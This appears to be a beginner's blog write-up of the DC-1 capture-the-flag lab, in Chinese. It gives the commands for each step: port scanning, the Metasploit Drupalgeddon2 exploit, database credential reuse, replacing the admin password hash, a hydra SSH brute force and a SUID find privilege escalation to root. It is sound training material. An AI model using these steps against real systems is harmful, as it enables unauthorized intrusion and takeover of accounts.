DC-1靶機整個滲透程序(B站可以看小飛俠的視頻真的好!)
將kali和DC-1的網路均設定為NAT模式
獲取kali的IP地址
ifconfig 查看IP命令需要記住
掃描此IP段中存活的靶機IP
arp-scan -l
根據靶機MAC地址來確認其IP地址
用masscan快速掃描DC-1開放的埠
masscan --rate10000 -p 1-65535 192.168.220.131
--rate10000 用來定義掃描速率
-p 1-65535 定義掃描從1-65535埠
192.168.220.131 靶機IP
通過上一步掃描得到靶機開放的埠為22,80,111,55336
80埠一般為http網頁埠
22埠為ssh埠
(個人拙見,請各位看官評論補充)
直接采用nmap仔細掃80埠
(也是在網上看了很多發現都是搞得80埠,對其他埠我也不是很懂,就跟著做,請看官評論區補充為何只搞此埠,其他埠能不能搞?技術尚淺,海涵海涵,)
訪問80埠
http://192.168.220.131
直接火狐訪問就行,我們需要用到一個插件wappalyzer,直接在火狐的擴展和主題搜wappalyzer添加即可,添加完成之后回到靶機網站頁面點擊此插件,即可得到此網站的CMS版本,其實nmap仔細掃描時已經能看到其為Drupal7,對于本人這種菜鳥來說還是看這個插件比較直觀,
發現網站的CMS,開始尋找Drupal7是否存在漏洞可以利用,采用msf進行漏洞利用
在kali終端界面輸入,msfconsole,打開msf
也可以在kali的漏洞利用工具中打開metasploit framework
在msf命令下查找Drupal的相關漏洞
search drupal
利用序列為1的漏洞 exploit/unix/webapp/drupal_drupalgeddon2(對于此我也沒有考慮清楚為何要利用此漏洞,請看官評論區補充,謝謝!)
use 1
或者 use exploit/unix/webapp/drupal_drupalgeddon2
然后show options (此原理我也不懂,請看官補充)
為RHOSTS設定IP
set RHOSTS 192.168.220.131
exploit
shell
python -c 'import pty;pty.spawn("/bin/bash")'
即可看見第一個flag檔案:flag1.txt
查看flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
提示查找組態檔
在此目錄下輸入ls查看此目錄下存在的檔案有哪些
看到sites(站點)
ls sites 查看站點檔案,發現發現default(默認)檔案
ls sites/default 查看其中的內容 發現setting.php檔案
cd sites/default 進入default檔案
vi setting.php 打開此檔案,發現flag2(也可以cat此檔案,vi退出為輸入:q回車)
flag2提示
Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these
暴力 力量 字典 攻擊 獲得 通過
credentials?
證書,憑證
也就是暴力破解不一定是一個好辦法,下面有資料庫相關資訊,我們可以看到資料庫為mysql并且能得到用戶名和密碼
登錄此資料庫
mysql -udbuser -pR0ck3t
查看資料庫內容
show databases; (資料庫結束語帶分號;)
發現drupaldb也就是drupal的資料庫,進入其中
use drupaldb
查看此資料庫中的表
show tables
在此表中我們可以發現一個名為users的表,展現此表中的資料
select * from users;
我們可以看見用戶名為admin的賬戶,并且看到其密碼,但是已經被加密過,
嘗試發現密碼的加密規則,新開一個終端視窗輸入hash-identifier 查詢密碼的加密方式
$S$D7BoMCmj4828RFeq3OSlxq6p1W5ObcqM/PNcLKg4wPqjLhvN1di9
發現查詢不到,當然,這一步并不是無用功,正是因為查詢不到其加密方式,所以暴力破解是無法攻破的,因此我們需要換種方式,經過百度其他人的成果(雖然這樣不好,但是我這菜雞還是沒想到如何才能搞定這個)發現Drupal可以利用password-hash.sh檔案來生成此種加密的結果,
退出資料庫尋找password-hash.sh程式,直接cd / 回傳根目錄,然后find查找
find / -name password-hash* 查詢名字中包含password-hash的所有檔案
發現/var/www/scripts/password-hash.sh 來到scripts檔案進行呼叫,此處呼叫不成功,回到www目錄下,然后運行
scripts/password-hash.sh 123456 得到加密結果
password: 123456 hash: $S$DqmSfBfFUmIoobomWlB45XSI7MG..o9y9zzUQEc2xGzYXgxfnM19
回到資料庫中,將密碼進行替換
update users set pass=’$S$DqmSfBfFUmIoobomWlB45XSI7MG..o9y9zzUQEc2xGzYXgxfnM19‘ where uid = 1;
更新 表名 設定 列名=’更改的值‘ where 列名=1;
更新完成之后,在網頁登錄
登錄之后發現flag3
說實話這一步的提示沒看懂(請看官評論區補充一下這個是啥意思)
獲取第四個flag
這個是百度出來的,回傳到/目錄下,ls發現etc檔案
cd etc 打開etc檔案,發現passwd,此檔案并非密碼檔案,而是賬戶檔案(我也不是很懂,請看官補充)
cat passwd
發現flag4,其為一個賬戶,
cat passwd,發現flag4賬戶,根據百度結果,直接對此賬戶進行暴力破解
暴力破解flag4賬戶
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.220.131
hydra海德拉破解 -l 指定破解賬戶 -P(大寫) 指定字典檔案 ssh://192.168.220.131 目標靶機
此步要在kaili終端進行
破解完成之后連接到flag4賬戶
ssh flag4@192.168.220.131
輸入破解到的密碼orange
直接find提權(這一步我是最不理解的,請看官給出意見!謝謝!)
find -name flag4.txt -exec /bin/bash -p \;
完成提權
whoami
發現自己是root
然后cd /root
發現最終的flag
終于完成了,雖然中間有很多坎坷,也有很多不懂的地方,但是最起碼做了一遍讓自己有一個初步的印象,相信慢慢的就能理解其中的意思了,也希望各位看官給出寶貴意見!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/335437.html
標籤:其他
上一篇:web安全:mysql提權總結篇
下一篇:中職網安 第二階段加固靶機 筆記